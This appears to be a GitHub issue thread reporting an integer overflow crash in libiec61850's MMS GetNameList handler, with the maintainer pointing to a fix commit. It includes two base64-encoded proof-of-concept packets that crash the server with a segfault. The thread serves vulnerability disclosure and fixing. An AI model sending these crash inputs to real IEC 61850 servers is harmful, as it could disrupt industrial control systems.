Closed Alice-and-Bob closed 4 months ago
hi,@mzillgith and teams. If you handle the error as soon as possible, I will provide all possible information
Hi, Thank you. However you are using a very old version of the library. Seems the problem is already fixed in the current versions of the library. But applying your poc2 seems to trigger another issue that should be fixed with commit https://github.com/mz-automation/libiec61850/commit/cf94d64206cf53298edf4799a75b31657bb7cbb3
Hi, Thank you. However you are using a very old version of the library. Seems the problem is already fixed in the current versions of the library. But applying your poc2 seems to trigger another issue that should be fixed with commit cf94d64
Yes, I found the bug fixed by the cf94d64 branch using poc2 before your. It is possible that I am mistaken about the poc and the vulnerability it corresponds to. However, this poc can cause SEGV errors in all versions before the fix is committed. I will address this in more detail in a separate issue.
Description
An integer overflow vulnerability was detected in the mMSserver_handleGetNamelist_service.c function of src/mms/iso_mms/server/mms_get_namelist_service.c. The vulnerability manifests as SEGV and causes the application to crash
version
v1.4.0 and earlier release
system information
ubuntu18.04
proof of concept
poc
root@VirtualBox:/iec61850-poc/mms_get_namelist_service# base64 poc1 AwAAQQLwgAEAAQBhNDAyAgEAoC2gKwIBGqEmoAOAAQChDYGLVEVNUExBVH////+CEExMTjAkQ0Yk U3RyVmFsMjA=
root@VirtualBox:/iec61850-poc/mms_get_namelist_service# base64 poc2 AwAAPgLwgAEAAQBhMTAvAgEAoCqgKAIBbK0jgCEBoR6AHDAaoBihFhoLVEVURQLw gAEAAQBhMTAv AgEAoCqgKAIBbK0jgCEBTEQwAgFs3H/+/qEToAIARU1BVEVMRA==
poc_of_mms_get_namelist_service.zip
command
result
gdb